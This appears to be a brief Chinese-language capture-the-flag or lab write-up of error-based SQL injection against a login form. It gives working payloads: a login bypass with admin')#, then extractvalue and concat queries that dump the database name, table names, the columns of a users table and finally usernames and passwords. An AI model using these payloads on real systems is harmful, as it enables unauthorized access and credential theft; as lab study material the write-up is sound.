首先需要判断一下注入类型
输入如下
admin'
存在报错信息 所以可以进行报错注入 但是无论正确与否都不会存在回显所以不能使用联合注入这题我们就是用报错注入吧 然后从报错信息我们可以知道注入类型为单引号注入 而且带有一个括号
我们进行作证 输入如下
admin')#
显示登陆成功 我们的判断是正确的
接下来进行爆库操作
输入如下
admin') and extractvalue(1,concat(0x7e,database(),0x7e));#
回显如下
接着进行报表操作
输入如下
admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e));#
回显如下
接着进行爆字段操作
输入如下
admin') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users"),0x7e));#
回显如下
最后进行爆用户名和密码操作
admin') and extractvalue(1,concat(0x7e,(select group_concat(username,password) from users),0x7e));#
好了 成功解题!!!嗨嗨